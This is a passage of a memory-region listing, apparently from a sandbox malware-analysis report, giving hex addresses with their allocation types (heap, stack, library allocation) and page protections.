page read and write
|
||
560A000
|
heap
|
page read and write
|
||
4D7E000
|
stack
|
page read and write
|
||
4B28000
|
trusted library allocation
|
page read and write
|
||
95F0000
|
heap
|
page read and write
|
||
E2B000
|
stack
|
page read and write
|
||
58EC000
|
trusted library allocation
|
page read and write
|
||
557E000
|
stack
|
page read and write
|
||
35E6000
|
heap
|
page read and write
|
||
6651000
|
heap
|
page read and write
|
||
5648000
|
heap
|
page read and write
|
||
5685000
|
heap
|
page read and write
|
||
6544000
|
heap
|
page read and write
|
||
7C50000
|
trusted library allocation
|
page read and write
|
||
34BE000
|
stack
|
page read and write
|
||
5629000
|
heap
|
page read and write
|
||
528D000
|
trusted library allocation
|
page read and write
|
||
8420000
|
heap
|
page read and write
|
||
47B8000
|
trusted library allocation
|
page read and write
|
||
317A000
|
heap
|
page read and write
|
||
16C0000
|
heap
|
page read and write
|
||
7020000
|
trusted library allocation
|
page read and write
|
||
596E000
|
stack
|
page read and write
|
||
4D80000
|
heap
|
page read and write
|
||
6485000
|
heap
|
page read and write
|
||
361B000
|
heap
|
page read and write
|
||
2D55000
|
heap
|
page read and write
|
||
777E000
|
stack
|
page read and write
|
||
47B0000
|
trusted library allocation
|
page read and write
|
||
6F9D000
|
stack
|
page read and write
|
||
5878000
|
trusted library allocation
|
page read and write
|
||
650B000
|
heap
|
page read and write
|
||
59B0000
|
trusted library allocation
|
page read and write
|
||
89EC000
|
stack
|
page read and write
|
||
4918000
|
trusted library allocation
|
page read and write
|
||
652A000
|
heap
|
page read and write
|
||
7360000
|
direct allocation
|
page read and write
|
||
2CD0000
|
heap
|
page read and write
|
||
4C10000
|
heap
|
page read and write
|
||
6613000
|
heap
|
page read and write
|
||
45DE000
|
stack
|
page read and write
|
||
6F7D000
|
stack
|
page read and write
|
||
64F3000
|
heap
|
page read and write
|
||
2CD0000
|
heap
|
page read and write
|
||
3440000
|
heap
|
page readonly
|
||
798D000
|
heap
|
page read and write
|
||
2CCB000
|
heap
|
page read and write
|
||
55BE000
|
heap
|
page read and write
|
||
6542000
|
heap
|
page read and write
|
||
6D72000
|
heap
|
page read and write
|
||
27EA000
|
trusted library allocation
|
page execute and read and write
|
||
76AF000
|
stack
|
page read and write
|
||
836E000
|
stack
|
page read and write
|
||
4680000
|
heap
|
page execute and read and write
|
||
361A000
|
heap
|
page read and write
|
||
8892000
|
heap
|
page read and write
|
||
652A000
|
heap
|
page read and write
|
||
3750000
|
heap
|
page read and write
|
||
5A8F000
|
stack
|
page read and write
|
||
6F80000
|
trusted library allocation
|
page execute and read and write
|
||
48C7000
|
heap
|
page read and write
|
||
7800000
|
trusted library allocation
|
page read and write
|
||
465E000
|
stack
|
page read and write
|
||
28FC000
|
heap
|
page read and write
|
||
2CA1000
|
heap
|
page read and write
|
||
7A97000
|
trusted library allocation
|
page read and write
|
||
71FE000
|
stack
|
page read and write
|
||
7FD78000
|
trusted library allocation
|
page execute and read and write
|
||
2F59000
|
heap
|
page read and write
|
||
70F0000
|
heap
|
page read and write
|
||
6531000
|
heap
|
page read and write
|
||
6655000
|
heap
|
page read and write
|
||
6754000
|
trusted library allocation
|
page read and write
|
||
451E000
|
stack
|
page read and write
|
||
73CE000
|
stack
|
page read and write
|
||
64BC000
|
heap
|
page read and write
|
||
4F6000
|
heap
|
page read and write
|
||
2D10000
|
heap
|
page read and write
|
||
7CD0000
|
trusted library allocation
|
page read and write
|
||
4D34000
|
heap
|
page read and write
|
||
5699000
|
trusted library allocation
|
page read and write
|
||
6620000
|
heap
|
page read and write
|
||
3619000
|
heap
|
page read and write
|
||
5621000
|
trusted library allocation
|
page read and write
|
||
35FE000
|
heap
|
page read and write
|
||
8220000
|
trusted library allocation
|
page execute and read and write
|
||
8443000
|
heap
|
page read and write
|
||
4770000
|
trusted library allocation
|
page read and write
|
||
569B000
|
heap
|
page read and write
|
||
7960000
|
heap
|
page read and write
|
||
7B3E000
|
stack
|
page read and write
|
||
6F6C000
|
stack
|
page read and write
|
||
561C000
|
heap
|
page read and write
|
||
34B8000
|
trusted library allocation
|
page read and write
|
||
6620000
|
heap
|
page read and write
|
||
7FD60000
|
trusted library allocation
|
page execute and read and write
|
||
5AF9000
|
trusted library allocation
|
page read and write
|
||
64FC000
|
heap
|
page read and write
|
||
2F6E000
|
stack
|
page read and write
|
||
79D2000
|
heap
|
page read and write
|
||
33D0000
|
trusted library allocation
|
page read and write
|
||
797D000
|
heap
|
page read and write
|
||
DF0000
|
heap
|
page read and write
|
||
6550000
|
heap
|
page read and write
|
||
7790000
|
trusted library allocation
|
page read and write
|
||
5642000
|
heap
|
page read and write
|
||
64FC000
|
heap
|
page read and write
|
||
748A000
|
stack
|
page read and write
|
||
64C0000
|
heap
|
page read and write
|
||
12E0000
|
heap
|
page read and write
|
||
642000
|
heap
|
page read and write
|
||
64E9000
|
heap
|
page read and write
|
||
8A22000
|
trusted library allocation
|
page read and write
|
||
79C0000
|
heap
|
page read and write
|
||
64B5000
|
heap
|
page read and write
|
||
7C10000
|
trusted library allocation
|
page read and write
|
||
4750000
|
trusted library allocation
|
page read and write
|
||
6550000
|
heap
|
page read and write
|
||
6523000
|
heap
|
page read and write
|
||
8250000
|
trusted library allocation
|
page read and write
|
||
52B4000
|
trusted library allocation
|
page read and write
|
||
55FE000
|
heap
|
page read and write
|
||
7A8E000
|
stack
|
page read and write
|
||
7C40000
|
trusted library allocation
|
page read and write
|
||
490D000
|
stack
|
page read and write
|
||
53E000
|
stack
|
page read and write
|
||
657A000
|
heap
|
page read and write
|
||
6513000
|
heap
|
page read and write
|
||
691E000
|
stack
|
page read and write
|
||
7BD0000
|
trusted library allocation
|
page read and write
|
||
2CC7000
|
heap
|
page read and write
|
||
5AD1000
|
trusted library allocation
|
page read and write
|
||
569B000
|
heap
|
page read and write
|
||
5640000
|
heap
|
page read and write
|
||
6B8E000
|
stack
|
page read and write
|
||
61AB000
|
trusted library allocation
|
page read and write
|
||
35EA000
|
heap
|
page read and write
|
||
3400000
|
trusted library allocation
|
page read and write
|
||
6EFE000
|
stack
|
page read and write
|
||
652C000
|
heap
|
page read and write
|
||
6651000
|
heap
|
page read and write
|
||
8660000
|
heap
|
page read and write
|
||
3617000
|
heap
|
page read and write
|
||
650B000
|
heap
|
page read and write
|
||
6531000
|
heap
|
page read and write
|
||
6BD0000
|
heap
|
page execute and read and write
|
||
55F0000
|
heap
|
page read and write
|
||
5216000
|
trusted library allocation
|
page read and write
|
||
6757000
|
trusted library allocation
|
page read and write
|
||
2CB4000
|
heap
|
page read and write
|
||
2C91000
|
heap
|
page read and write
|
||
2CEB000
|
heap
|
page read and write
|
||
7ADF000
|
stack
|
page read and write
|
||
6655000
|
heap
|
page read and write
|
||
6487000
|
heap
|
page read and write
|
||
5410000
|
heap
|
page read and write
|
||
6C12000
|
heap
|
page read and write
|
||
6613000
|
heap
|
page read and write
|
||
73A2000
|
heap
|
page read and write
|
||
5612000
|
heap
|
page read and write
|
||
489C000
|
stack
|
page read and write
|
||
777E000
|
stack
|
page read and write
|
||
4F0000
|
heap
|
page read and write
|
||
6490000
|
heap
|
page read and write
|
||
588E000
|
stack
|
page read and write
|
||
6DAD000
|
heap
|
page read and write
|
||
652C000
|
heap
|
page read and write
|
||
5640000
|
heap
|
page read and write
|
||
3439000
|
trusted library allocation
|
page read and write
|
||
79D7000
|
heap
|
page read and write
|
||
79E8000
|
heap
|
page read and write
|
||
8A40000
|
trusted library allocation
|
page execute and read and write
|
||
6487000
|
heap
|
page read and write
|
||
4E10000
|
heap
|
page execute and read and write
|
||
64F2000
|
heap
|
page read and write
|
||
6550000
|
heap
|
page read and write
|
||
5644000
|
heap
|
page read and write
|
||
6D82000
|
heap
|
page read and write
|
||
6513000
|
heap
|
page read and write
|
||
689C000
|
stack
|
page read and write
|
||
873F000
|
stack
|
page read and write
|
||
64FC000
|
heap
|
page read and write
|
||
695D000
|
stack
|
page read and write
|
||
64FC000
|
heap
|
page read and write
|
||
340A000
|
trusted library allocation
|
page execute and read and write
|
||
868D000
|
trusted library allocation
|
page read and write
|
||
5691000
|
trusted library allocation
|
page read and write
|
||
33A0000
|
heap
|
page read and write
|
||
2C60000
|
heap
|
page read and write
|
||
7A40000
|
trusted library allocation
|
page execute and read and write
|
||
51D1000
|
trusted library allocation
|
page read and write
|
||
6507000
|
heap
|
page read and write
|
||
51C1000
|
trusted library allocation
|
page read and write
|
||
3530000
|
heap
|
page read and write
|
||
66A1000
|
trusted library allocation
|
page read and write
|
||
675F000
|
trusted library allocation
|
page read and write
|
||
6651000
|
heap
|
page read and write
|
||
6654000
|
heap
|
page read and write
|
||
88AD000
|
heap
|
page read and write
|
||
563B000
|
heap
|
page read and write
|
||
6544000
|
heap
|
page read and write
|
||
7040000
|
trusted library allocation
|
page read and write
|
||
65A0000
|
heap
|
page read and write
|
||
63F000
|
heap
|
page read and write
|
||
3420000
|
trusted library allocation
|
page read and write
|
||
6EDB000
|
stack
|
page read and write
|
||
3126000
|
heap
|
page read and write
|
||
3470000
|
trusted library allocation
|
page read and write
|
||
6531000
|
heap
|
page read and write
|
||
77BE000
|
stack
|
page read and write
|
||
734B000
|
stack
|
page read and write
|
||
35E3000
|
heap
|
page read and write
|
||
65A5000
|
heap
|
page read and write
|
||
6657000
|
heap
|
page read and write
|
||
DDE000
|
stack
|
page read and write
|
||
7C00000
|
trusted library allocation
|
page read and write
|
||
6B0D000
|
trusted library allocation
|
page read and write
|
||
35FC000
|
heap
|
page read and write
|
||
7CB0000
|
trusted library allocation
|
page read and write
|
||
753A000
|
heap
|
page read and write
|
||
2D59000
|
heap
|
page read and write
|
||
766E000
|
stack
|
page read and write
|
||
34E8000
|
heap
|
page read and write
|
||
6531000
|
heap
|
page read and write
|
||
6D65000
|
heap
|
page read and write
|
||
5636000
|
heap
|
page read and write
|
||
7A9A000
|
trusted library allocation
|
page read and write
|
||
7BF0000
|
trusted library allocation
|
page read and write
|
||
2E6E000
|
stack
|
page read and write
|
||
64E9000
|
heap
|
page read and write
|
||
33F0000
|
trusted library allocation
|
page read and write
|
||
34D0000
|
heap
|
page read and write
|
||
E90000
|
heap
|
page read and write
|
||
47A0000
|
heap
|
page readonly
|
||
34C0000
|
heap
|
page readonly
|
||
7A90000
|
trusted library allocation
|
page read and write
|
||
459E000
|
stack
|
page read and write
|
||
744D000
|
stack
|
page read and write
|
||
64FC000
|
heap
|
page read and write
|
||
582000
|
heap
|
page read and write
|
||
33E3000
|
trusted library allocation
|
page execute and read and write
|
||
74B0000
|
trusted library section
|
page read and write
|
||
6685000
|
heap
|
page read and write
|
||
2CB1000
|
heap
|
page read and write
|
||
55E1000
|
heap
|
page read and write
|
||
5648000
|
heap
|
page read and write
|
||
3460000
|
heap
|
page execute and read and write
|
||
7AFE000
|
stack
|
page read and write
|
||
4790000
|
trusted library allocation
|
page read and write
|
||
64F8000
|
heap
|
page read and write
|
||
151F000
|
stack
|
page read and write
|
||
5BEE000
|
stack
|
page read and write
|
||
653E000
|
heap
|
page read and write
|
||
5688000
|
heap
|
page read and write
|
||
358C000
|
heap
|
page read and write
|
||
758B000
|
stack
|
page read and write
|
||
5506000
|
trusted library allocation
|
page read and write
|
||
681D000
|
stack
|
page read and write
|
||
64E9000
|
heap
|
page read and write
|
||
8C50000
|
trusted library allocation
|
page read and write
|
||
5838000
|
trusted library allocation
|
page read and write
|
||
6970000
|
heap
|
page read and write
|
||
7BBD000
|
stack
|
page read and write
|
||
5297000
|
trusted library allocation
|
page read and write
|
||
2CBF000
|
heap
|
page read and write
|
||
7340000
|
direct allocation
|
page read and write
|
||
5436000
|
trusted library allocation
|
page read and write
|
||
33E0000
|
trusted library allocation
|
page read and write
|
||
652A000
|
heap
|
page read and write
|
||
7A40000
|
trusted library allocation
|
page execute and read and write
|
||
559F000
|
heap
|
page read and write
|
||
5AD9000
|
trusted library allocation
|
page read and write
|
||
6523000
|
heap
|
page read and write
|
||
7490000
|
trusted library allocation
|
page read and write
|
||
2DF7000
|
heap
|
page read and write
|
||
7C60000
|
trusted library allocation
|
page read and write
|
||
2780000
|
heap
|
page read and write
|
||
360C000
|
heap
|
page read and write
|
||
6660000
|
heap
|
page read and write
|
||
35F7000
|
heap
|
page read and write
|
||
64D1000
|
heap
|
page read and write
|
||
7982000
|
heap
|
page read and write
|
||
6550000
|
heap
|
page read and write
|
||
64FC000
|
heap
|
page read and write
|
||
6C8F000
|
stack
|
page read and write
|
||
7740000
|
trusted library allocation
|
page execute and read and write
|
||
63A1000
|
heap
|
page read and write
|
||
2CDB000
|
heap
|
page read and write
|
||
72F2000
|
direct allocation
|
page read and write
|
||
6B20000
|
trusted library allocation
|
page read and write
|
||
2DBC000
|
stack
|
page read and write
|
||
869C000
|
trusted library allocation
|
page read and write
|
||
549C000
|
stack
|
page read and write
|
||
6681000
|
heap
|
page read and write
|
||
65AF000
|
heap
|
page read and write
|
||
79E0000
|
heap
|
page read and write
|
||
7100000
|
heap
|
page read and write
|
||
3110000
|
heap
|
page read and write
|
||
68E000
|
stack
|
page read and write
|
||
75F8000
|
heap
|
page read and write
|
||
492E000
|
trusted library allocation
|
page read and write
|
||
5D2E000
|
stack
|
page read and write
|
||
3450000
|
trusted library allocation
|
page read and write
|
||
32EC000
|
heap
|
page read and write
|
||
64F7000
|
heap
|
page read and write
|
||
7C70000
|
trusted library allocation
|
page read and write
|
||
7D6E000
|
stack
|
page read and write
|
||
2CDB000
|
heap
|
page read and write
|
||
650B000
|
heap
|
page read and write
|
||
64C4000
|
heap
|
page read and write
|
||
547F000
|
trusted library allocation
|
page read and write
|
||
8210000
|
heap
|
page read and write
|
||
7871000
|
heap
|
page read and write
|
||
3279000
|
heap
|
page read and write
|
||
6B0E000
|
stack
|
page read and write
|
||
66A3000
|
trusted library allocation
|
page read and write
|
||
773E000
|
stack
|
page read and write
|
||
5699000
|
heap
|
page read and write
|
||
6654000
|
heap
|
page read and write
|
||
671D000
|
stack
|
page read and write
|
||
5644000
|
heap
|
page read and write
|
||
5621000
|
heap
|
page read and write
|
||
77E0000
|
trusted library allocation
|
page read and write
|
||
6651000
|
heap
|
page read and write
|
||
6685000
|
heap
|
page read and write
|
||
2CDB000
|
heap
|
page read and write
|
||
6CE000
|
stack
|
page read and write
|
||
2E8E000
|
stack
|
page read and write
|
||
6652000
|
heap
|
page read and write
|
||
6497000
|
heap
|
page read and write
|
||
5696000
|
heap
|
page read and write
|
||
650B000
|
heap
|
page read and write
|
||
2CDB000
|
heap
|
page read and write
|
||
6D2A000
|
heap
|
page read and write
|
||
733E000
|
stack
|
page read and write
|
||
730D000
|
stack
|
page read and write
|
||
7830000
|
trusted library allocation
|
page read and write
|
||
3337000
|
heap
|
page read and write
|
||
56B9000
|
trusted library allocation
|
page read and write
|
||
5642000
|
heap
|
page read and write
|
||
5648000
|
heap
|
page read and write
|
||
6E70000
|
heap
|
page read and write
|
||
4700000
|
heap
|
page read and write
|
||
2DFC000
|
stack
|
page read and write
|
||
6686000
|
heap
|
page read and write
|
||
491C000
|
trusted library allocation
|
page read and write
|
||
75EB000
|
heap
|
page read and write
|
||
6542000
|
heap
|
page read and write
|
||
6684000
|
heap
|
page read and write
|
||
7BAE000
|
stack
|
page read and write
|
||
72A0000
|
direct allocation
|
page read and write
|
||
4691000
|
trusted library allocation
|
page read and write
|
||
643F000
|
heap
|
page read and write
|
||
6490000
|
heap
|
page read and write
|
||
6613000
|
heap
|
page read and write
|
||
4D30000
|
heap
|
page read and write
|
||
6653000
|
heap
|
page read and write
|
||
679E000
|
stack
|
page read and write
|
||
70DB000
|
stack
|
page read and write
|
||
2CBB000
|
heap
|
page read and write
|
||
5CF000
|
heap
|
page read and write
|
||
3250000
|
heap
|
page read and write
|
||
3430000
|
trusted library allocation
|
page read and write
|
||
643A000
|
heap
|
page read and write
|
||
64F9000
|
heap
|
page read and write
|
||
12E8000
|
heap
|
page read and write
|
||
7947000
|
heap
|
page read and write
|
||
7970000
|
heap
|
page read and write
|
||
545E000
|
trusted library allocation
|
page read and write
|
||
61B1000
|
trusted library allocation
|
page read and write
|
||
2D06000
|
heap
|
page read and write
|
||
35E9000
|
heap
|
page read and write
|
||
2F10000
|
heap
|
page read and write
|
||
351E000
|
stack
|
page read and write
|
||
3415000
|
trusted library allocation
|
page execute and read and write
|
||
29F0000
|
heap
|
page read and write
|
||
4DE0000
|
heap
|
page read and write
|
||
2FAE000
|
stack
|
page read and write
|
||
64FC000
|
heap
|
page read and write
|
||
5685000
|
heap
|
page read and write
|
||
6651000
|
heap
|
page read and write
|
||
28D0000
|
trusted library allocation
|
page execute and read and write
|
||
889A000
|
heap
|
page read and write
|
||
7A30000
|
heap
|
page read and write
|
||
653E000
|
heap
|
page read and write
|
||
5686000
|
heap
|
page read and write
|
||
64FC000
|
heap
|
page read and write
|
||
32FF000
|
heap
|
page read and write
|
||
5612000
|
heap
|
page read and write
|
||
44A0000
|
heap
|
page execute and read and write
|
||
3410000
|
trusted library allocation
|
page read and write
|
||
87E0000
|
heap
|
page read and write
|
||
4DF0000
|
heap
|
page read and write
|
||
7A0B000
|
heap
|
page read and write
|
||
6FDA000
|
stack
|
page read and write
|
||
3608000
|
heap
|
page read and write
|
||
11C000
|
stack
|
page read and write
|
||
842B000
|
heap
|
page read and write
|
||
2CD0000
|
heap
|
page read and write
|
||
55D4000
|
heap
|
page read and write
|
||
6531000
|
heap
|
page read and write
|
||
30F0000
|
trusted library allocation
|
page read and write
|
||
64C0000
|
heap
|
page read and write
|
||
6654000
|
heap
|
page read and write
|
||
78F0000
|
heap
|
page execute and read and write
|
||
5640000
|
heap
|
page read and write
|
||
35EB000
|
heap
|
page read and write
|
||
6651000
|
heap
|
page read and write
|
||
6542000
|
heap
|
page read and write
|
||
54B1000
|
trusted library allocation
|
page read and write
|
||
2810000
|
trusted library allocation
|
page read and write
|
||
6508000
|
heap
|
page read and write
|
||
8690000
|
trusted library allocation
|
page read and write
|
||
5638000
|
heap
|
page read and write
|
||
6531000
|
heap
|
page read and write
|
||
2C91000
|
heap
|
page read and write
|
||
675A000
|
stack
|
page read and write
|
||
647C000
|
heap
|
page read and write
|
||
2CE7000
|
heap
|
page read and write
|
||
6F90000
|
trusted library allocation
|
page read and write
|
||
2CD4000
|
heap
|
page read and write
|
||
6E9D000
|
stack
|
page read and write
|
||
5612000
|
heap
|
page read and write
|
||
57DE000
|
stack
|
page read and write
|
||
2CA5000
|
heap
|
page read and write
|
||
7400000
|
heap
|
page read and write
|
||
27D9000
|
trusted library allocation
|
page read and write
|
||
8820000
|
heap
|
page read and write
|
||
6655000
|
heap
|
page read and write
|
||
6AED000
|
trusted library allocation
|
page read and write
|
||
8C2E000
|
stack
|
page read and write
|
||
2D96000
|
heap
|
page read and write
|
||
5864000
|
heap
|
page read and write
|
||
79EE000
|
heap
|
page read and write
|
||
5598000
|
heap
|
page read and write
|
||
27D0000
|
trusted library allocation
|
page read and write
|
||
7B0E000
|
stack
|
page read and write
|
||
48B0000
|
trusted library allocation
|
page read and write
|
||
5030000
|
heap
|
page read and write
|
||
772D000
|
stack
|
page read and write
|
||
5610000
|
heap
|
page read and write
|
||
6413000
|
heap
|
page read and write
|
||
7050000
|
trusted library allocation
|
page read and write
|
||
71BE000
|
stack
|
page read and write
|
||
653E000
|
heap
|
page read and write
|
||
6FA0000
|
trusted library allocation
|
page read and write
|
||
7920000
|
heap
|
page read and write
|
||
4AC0000
|
heap
|
page read and write
|
||
55C5000
|
heap
|
page read and write
|
||
6635000
|
heap
|
page read and write
|
||
5846000
|
heap
|
page read and write
|
||
49E0000
|
heap
|
page execute and read and write
|
||
30CD000
|
unkown
|
page read and write
|
||
8680000
|
trusted library allocation
|
page read and write
|
||
35E3000
|
heap
|
page read and write
|
||
55B8000
|
heap
|
page read and write
|
||
4E5E000
|
stack
|
page read and write
|
||
878E000
|
stack
|
page read and write
|
||
733D000
|
stack
|
page read and write
|
||
8260000
|
heap
|
page read and write
|
||
653E000
|
heap
|
page read and write
|
||
86C0000
|
trusted library allocation
|
page read and write
|
||
6514000
|
heap
|
page read and write
|
||
6509000
|
heap
|
page read and write
|
||
6686000
|
heap
|
page read and write
|
||
648A000
|
heap
|
page read and write
|
||
7C50000
|
trusted library allocation
|
page read and write
|
||
5604000
|
heap
|
page read and write
|
||
643E000
|
heap
|
page read and write
|
||
3038000
|
stack
|
page read and write
|
||
6FE6000
|
trusted library allocation
|
page read and write
|
||
34F0000
|
heap
|
page read and write
|
||
8862000
|
heap
|
page read and write
|
||
6D2E000
|
heap
|
page read and write
|
||
643F000
|
heap
|
page read and write
|
||
3455000
|
trusted library allocation
|
page execute and read and write
|
||
65F7000
|
heap
|
page read and write
|
||
86A0000
|
trusted library allocation
|
page read and write
|
||
55F0000
|
heap
|
page read and write
|
||
5635000
|
heap
|
page read and write
|
||
72FF000
|
stack
|
page read and write
|
||
6A30000
|
trusted library allocation
|
page read and write
|
||
32AD000
|
heap
|
page read and write
|
||
5603000
|
heap
|
page read and write
|
||
63A0000
|
heap
|
page read and write
|
||
6513000
|
heap
|
page read and write
|
||
652C000
|
heap
|
page read and write
|
||
7A50000
|
trusted library allocation
|
page read and write
|
||
7B20000
|
trusted library allocation
|
page execute and read and write
|
||
74A0000
|
trusted library allocation
|
page read and write
|
||
35E6000
|
heap
|
page read and write
|
||
6651000
|
heap
|
page read and write
|
||
46F4000
|
trusted library allocation
|
page read and write
|
||
653E000
|
heap
|
page read and write
|
||
358C000
|
heap
|
page read and write
|
||
7810000
|
trusted library allocation
|
page read and write
|
||
28FA000
|
heap
|
page read and write
|
||
6660000
|
heap
|
page read and write
|
||
652A000
|
heap
|
page read and write
|
||
650B000
|
heap
|
page read and write
|
||
639E000
|
stack
|
page read and write
|
||
5648000
|
heap
|
page read and write
|
||
4759000
|
trusted library allocation
|
page read and write
|
||
2CC7000
|
heap
|
page read and write
|
||
27CD000
|
trusted library allocation
|
page execute and read and write
|
||
748E000
|
stack
|
page read and write
|
||
581E000
|
stack
|
page read and write
|
||
6513000
|
heap
|
page read and write
|
||
64D0000
|
heap
|
page read and write
|
||
6F3E000
|
stack
|
page read and write
|
||
3457000
|
trusted library allocation
|
page execute and read and write
|
||
643A000
|
heap
|
page read and write
|
||
7A19000
|
heap
|
page read and write
|
||
6E6D000
|
stack
|
page read and write
|
||
55A8000
|
trusted library allocation
|
page read and write
|
||
35E5000
|
heap
|
page read and write
|
||
62D7000
|
trusted library allocation
|
page read and write
|
||
28E0000
|
trusted library allocation
|
page read and write
|
||
7C20000
|
trusted library allocation
|
page read and write
|
||
337E000
|
stack
|
page read and write
|
||
2D09000
|
heap
|
page read and write
|
||
5499000
|
trusted library allocation
|
page read and write
|
||
661E000
|
heap
|
page read and write
|
||
4772000
|
trusted library allocation
|
page read and write
|
||
2DF8000
|
stack
|
page read and write
|
||
82ED000
|
stack
|
page read and write
|
||
30B0000
|
heap
|
page read and write
|
||
6681000
|
heap
|
page read and write
|
||
347F000
|
stack
|
page read and write
|
||
29F6000
|
heap
|
page read and write
|
||
361A000
|
heap
|
page read and write
|
||
6663000
|
heap
|
page read and write
|
||
79C6000
|
heap
|
page read and write
|
||
27C3000
|
trusted library allocation
|
page execute and read and write
|
||
4DCE000
|
stack
|
page read and write
|
||
6556000
|
heap
|
page read and write
|
||
5639000
|
heap
|
page read and write
|
||
64B8000
|
heap
|
page read and write
|
||
7A9E000
|
stack
|
page read and write
|
||
65B2000
|
heap
|
page read and write
|
||
5642000
|
heap
|
page read and write
|
||
652A000
|
heap
|
page read and write
|
||
2CAE000
|
heap
|
page read and write
|
||
4C27000
|
trusted library allocation
|
page read and write
|
||
65AF000
|
heap
|
page read and write
|
||
705A000
|
stack
|
page read and write
|
||
6513000
|
heap
|
page read and write
|
||
8740000
|
heap
|
page read and write
|
||
654C000
|
heap
|
page read and write
|
||
6681000
|
heap
|
page read and write
|
||
2CCA000
|
heap
|
page read and write
|
||
495E000
|
stack
|
page read and write
|
||
5638000
|
heap
|
page read and write
|
||
4AD1000
|
trusted library allocation
|
page read and write
|
||
EA0000
|
heap
|
page read and write
|
||
61D9000
|
trusted library allocation
|
page read and write
|
||
8230000
|
trusted library allocation
|
page read and write
|
||
3550000
|
heap
|
page read and write
|
||
7C80000
|
trusted library allocation
|
page read and write
|
||
661E000
|
heap
|
page read and write
|
||
568B000
|
heap
|
page read and write
|
||
4D26000
|
trusted library allocation
|
page read and write
|
||
502E000
|
stack
|
page read and write
|
||
3065000
|
heap
|
page read and write
|
||
6BCE000
|
stack
|
page read and write
|
||
8790000
|
heap
|
page read and write
|
||
3560000
|
heap
|
page read and write
|
||
6FC0000
|
trusted library allocation
|
page read and write
|
||
312A000
|
heap
|
page read and write
|
||
6615000
|
heap
|
page read and write
|
||
44D0000
|
heap
|
page read and write
|
||
4E00000
|
heap
|
page read and write
|
||
2CD4000
|
heap
|
page read and write
|
||
74CE000
|
stack
|
page read and write
|
||
6E00000
|
trusted library allocation
|
page read and write
|
||
360F000
|
heap
|
page read and write
|
||
53CC000
|
trusted library allocation
|
page read and write
|
||
310E000
|
unkown
|
page read and write
|
||
4C16000
|
heap
|
page read and write
|
||
3614000
|
heap
|
page read and write
|
||
652A000
|
heap
|
page read and write
|
||
2CE9000
|
heap
|
page read and write
|
||
5442000
|
trusted library allocation
|
page read and write
|
||
285E000
|
stack
|
page read and write
|
||
754B000
|
stack
|
page read and write
|
||
7385000
|
heap
|
page execute and read and write
|
||
643D000
|
heap
|
page read and write
|
||
83DB000
|
stack
|
page read and write
|
||
4FAC000
|
stack
|
page read and write
|
||
7CC0000
|
trusted library allocation
|
page read and write
|
||
2C40000
|
heap
|
page read and write
|
||
2CD4000
|
heap
|
page read and write
|
||
35F9000
|
heap
|
page read and write
|
||
3270000
|
heap
|
page read and write
|
||
30AF000
|
stack
|
page read and write
|
||
5A6E000
|
stack
|
page read and write
|
||
653E000
|
heap
|
page read and write
|
||
55F8000
|
heap
|
page read and write
|
||
7520000
|
heap
|
page read and write
|
||
33F9000
|
trusted library allocation
|
page read and write
|
||
2CE7000
|
heap
|
page read and write
|
||
49DE000
|
stack
|
page read and write
|
||
6550000
|
heap
|
page read and write
|
||
6FD0000
|
trusted library allocation
|
page read and write
|
||
6542000
|
heap
|
page read and write
|
||
2CC7000
|
heap
|
page read and write
|
||
69E0000
|
trusted library allocation
|
page read and write
|
||
27C4000
|
trusted library allocation
|
page read and write
|
||
55F8000
|
heap
|
page read and write
|
||
6686000
|
heap
|
page read and write
|
||
8A2C000
|
stack
|
page read and write
|
||
6432000
|
heap
|
page read and write
|
||
7030000
|
trusted library allocation
|
page read and write
|
||
27B0000
|
trusted library allocation
|
page read and write
|
||
6750000
|
trusted library allocation
|
page read and write
|
||
650B000
|
heap
|
page read and write
|
||
6662000
|
heap
|
page read and write
|
||
8680000
|
trusted library allocation
|
page read and write
|
||
33ED000
|
trusted library allocation
|
page execute and read and write
|
||
706D000
|
stack
|
page read and write
|
||
2ECE000
|
stack
|
page read and write
|
||
650B000
|
heap
|
page read and write
|
||
652A000
|
heap
|
page read and write
|
||
528A000
|
trusted library allocation
|
page read and write
|
||
87C0000
|
trusted library allocation
|
page read and write
|
||
3120000
|
heap
|
page read and write
|
||
66AA000
|
trusted library allocation
|
page read and write
|
||
33AE000
|
stack
|
page read and write
|
||
568B000
|
heap
|
page read and write
|
||
75C0000
|
heap
|
page read and write
|
||
481E000
|
stack
|
page read and write
|
||
7A04000
|
heap
|
page read and write
|
||
64FC000
|
heap
|
page read and write
|
||
2C7E000
|
heap
|
page read and write
|
||
6D7E000
|
heap
|
page read and write
|
||
461D000
|
stack
|
page read and write
|
||
5610000
|
heap
|
page read and write
|
||
6634000
|
heap
|
page read and write
|
||
7F570000
|
trusted library allocation
|
page execute and read and write
|
||
6D58000
|
heap
|
page read and write
|
||
35EC000
|
heap
|
page read and write
|
||
7780000
|
trusted library allocation
|
page read and write
|
||
86B0000
|
trusted library allocation
|
page read and write
|
||
6685000
|
heap
|
page read and write
|
||
3581000
|
heap
|
page read and write
|
||
6681000
|
heap
|
page read and write
|
||
490C000
|
trusted library allocation
|
page read and write
|
||
7830000
|
heap
|
page execute and read and write
|
||
832F000
|
stack
|
page read and write
|
||
7320000
|
heap
|
page read and write
|
||
5612000
|
heap
|
page read and write
|
||
653E000
|
heap
|
page read and write
|
||
455F000
|
stack
|
page read and write
|
||
73CE000
|
stack
|
page read and write
|
||
4D0C000
|
stack
|
page read and write
|
||
6685000
|
heap
|
page read and write
|
||
6514000
|
heap
|
page read and write
|
||
650F000
|
heap
|
page read and write
|
||
64FC000
|
heap
|
page read and write
|
||
7974000
|
heap
|
page read and write
|
||
51B1000
|
trusted library allocation
|
page read and write
|
||
652A000
|
heap
|
page read and write
|
||
2CBB000
|
heap
|
page read and write
|
||
28F0000
|
heap
|
page read and write
|
||
2CDF000
|
heap
|
page read and write
|
||
44A5000
|
heap
|
page execute and read and write
|
||
77D0000
|
trusted library allocation
|
page read and write
|
||
4DF7000
|
heap
|
page read and write
|
||
77F0000
|
trusted library allocation
|
page read and write
|
||
6655000
|
heap
|
page read and write
|
||
6550000
|
heap
|
page read and write
|
||
7BE0000
|
heap
|
page read and write
|
||
2D19000
|
heap
|
page read and write
|
||
4D3C000
|
stack
|
page read and write
|
||
5638000
|
heap
|
page read and write
|
||
62F7000
|
trusted library allocation
|
page read and write
|
||
4E03000
|
heap
|
page read and write
|
||
362E000
|
heap
|
page read and write
|
||
27F5000
|
trusted library allocation
|
page execute and read and write
|
||
35F7000
|
heap
|
page read and write
|
||
5648000
|
heap
|
page read and write
|
||
737B000
|
stack
|
page read and write
|
||
5640000
|
heap
|
page read and write
|
||
51A4000
|
trusted library allocation
|
page read and write
|
||
653E000
|
heap
|
